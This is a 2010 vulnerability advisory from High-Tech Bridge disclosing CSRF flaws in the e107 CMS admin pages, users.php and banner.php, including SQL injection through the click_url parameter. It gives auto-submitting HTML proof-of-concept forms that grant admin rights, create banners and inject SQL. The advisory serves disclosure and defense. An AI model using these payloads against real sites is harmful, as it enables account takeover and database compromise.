Cross-site request forgery (CSRF) in e107

2010-04-05T00:00:00
ID HTB22344
Type htbridge
Reporter High-Tech Bridge
Modified 2010-04-05T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered two CSRF vulnerabilities in e107 which could allow a remote attacker to execute arbitrary SQL commands in application`s database and gain complete control over the application.
1) Cross-site request forgery in e107

1.1 The vulnerability is caused by insufficient validation of HTTP requests in /e107_admin/users.php. A remote attacker can trick a logged-in administrator into visiting a specially crafted webpage and assign administrative role to arbitrary existing account.

Exploitation example:

<form method=POST action=http://host/e107_admin/users.php name=main>
<input type=hidden name=userid value=2>
<input type=hidden name=userip value=1.2.3.4>
<input type=hidden name=useraction value=admin>
</form>
<script>
document.main.submit();
</script>
1.2 The vulnerability exists due to insufficient validation of the request origin in /e107_admin/banner.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create or update arbitrary banners.
Additionally the “click_url” parameter in /e107_admin/banner.php is not properly sanitized before being used in a SQL query. A remote attacker can use a CSRF vector to execute arbitrary SQL commands in application`s database.
Exploitation examples:

<form action=http://host/e107_admin/banner.php method=POST name=f>
<input type=hidden name=banner_campaign_sel value="campaign_one" >
<input type=hidden name=banner_campaign value="" >
<input type=hidden name=banner_client_sel value="e107" >
<input type=hidden name=client_name value="" >
<input type=hidden name=client_login value="e107login" >
<input type=hidden name=client_password value="e107password" >
<input type=hidden name=click_url value="http%3A%2F%2Fgoogle.com%2F" >
<input type=hidden name=impressions_purchased value="0" >
<input type=hidden name=banner_class value="0" >
<input type=hidden name=createbanner value="Create+New+Banner" >
</form>
<script>
document.f.submit();
</script>

<form action=http://host/e107_admin/banner.php method=POST name=f>
<input type=hidden name=createbanner value="Create+New+Banner" >
<input type=hidden name=click_url value="' ANY_SQL_HERE " >
</form>
<script>
document.f.submit();
</script>